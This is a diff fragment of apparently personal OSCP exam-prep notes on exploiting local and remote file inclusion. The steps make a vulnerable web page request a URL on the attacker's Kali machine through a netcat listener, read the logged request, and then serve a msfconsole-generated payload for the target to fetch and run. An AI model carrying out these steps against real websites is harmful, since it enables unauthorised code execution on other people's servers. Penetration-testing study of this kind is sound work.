M-1-7-7/Scripts/OSCP/websites/LFI_RFI.md

    b. use website to call back to nc listener `<url>/?page=http://<kali ip>:<port>/`

-2. . examine nc output
+2. examine nc output

          i. if the request looks like `GET / HTTP/1.0` then the webpage is not looking for any file type inparticulat

          ii. if the tequest looks like `GET /<file name> HTTP/1.0` then it is looking for a file with that file name

-   d. request like `GET / HTTP/1.0`:
+   a. for request like `GET / HTTP/1.0`:

          i. create payload with msfconsol and start a webserver in that location